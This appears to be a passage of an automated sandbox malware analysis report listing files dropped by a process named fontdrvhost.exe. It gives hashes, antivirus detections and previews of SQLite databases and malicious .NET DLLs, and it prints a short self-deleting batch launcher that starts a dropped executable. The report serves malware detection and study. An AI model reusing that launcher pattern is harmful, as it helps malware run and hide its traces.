                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):49152
                                                                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):106496
                                                                                                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):114688
                                                                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):126976
                                                                                                                                                                                            Entropy (8bit):0.47147045728725767
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                            MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                            SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                            SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                            SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):98304
                                                                                                                                                                                            Entropy (8bit):0.08235737944063153
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):5242880
                                                                                                                                                                                            Entropy (8bit):0.037963276276857943
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                            MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                            SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                            SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                            SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):159744
                                                                                                                                                                                            Entropy (8bit):0.7873599747470391
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                            MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                            SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                            SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                            SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):196
                                                                                                                                                                                            Entropy (8bit):5.346172368496825
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6:hCRLuVFOOr+DEo8GK9GtKOZG1wkn23fJM2G:CuVEOCDExGK9GdfRMl
                                                                                                                                                                                            MD5:C975FBE87D330EF2B5FAE59C796BF438
                                                                                                                                                                                            SHA1:FC80A882FEF60B01A70E741F79565904EE48C5F2
                                                                                                                                                                                            SHA-256:BA161E369B895077D1684E16820121ED9925E630E6ECFE0727C7976B7BEED9FA
                                                                                                                                                                                            SHA-512:BD0CC0526A192763E9797BA529CAF79BFC5C6DF110AA858B69A782C60351266696AEBF7DAFC8305425597C8E4DA2B1B752D259546BD70B57603CFFC262869D8D
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\lscqkorEZ8.bat"
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):28672
                                                                                                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):25
                                                                                                                                                                                            Entropy (8bit):4.403856189774723
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:ptysgK9:posgK9
                                                                                                                                                                                            MD5:A88F5DED316D85D4FEF27B4F943E13DF
                                                                                                                                                                                            SHA1:91695D12090CD4407895A1B3149850F8CC9D47B8
                                                                                                                                                                                            SHA-256:8D62EBD58291719202E077EB70DECD120D05AB1612FAED040C41253CEF5BC699
                                                                                                                                                                                            SHA-512:D997DC08AABEC2E170629278A4119BA7E08BFFBAED9B85E3C0A52062D786A18DC31B7671466251C523D0FD8B5AAAC48765CEE0D1F02B1158B7B315AB24472674
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:VmBCR8wHipLoNRBISayY1pU2X
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):114688
                                                                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):69632
                                                                                                                                                                                            Entropy (8bit):5.932541123129161
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                            • Filename: U1jaLbTw1f.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: voed9G7p5s.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: Etqq32Yuw4.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: KzLetzDiM8.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: f3I38kv.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: aimware.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: ZZ2sTsJFrt.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: r6cRyCpdfS.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: tBnELFfQoe.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: Z4D3XAZ2jB.exe, Detection: malicious, Browse
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):69632
                                                                                                                                                                                            Entropy (8bit):5.932541123129161
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):85504
                                                                                                                                                                                            Entropy (8bit):5.8769270258874755
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):85504
                                                                                                                                                                                            Entropy (8bit):5.8769270258874755
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):23552
                                                                                                                                                                                            Entropy (8bit):5.519109060441589
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
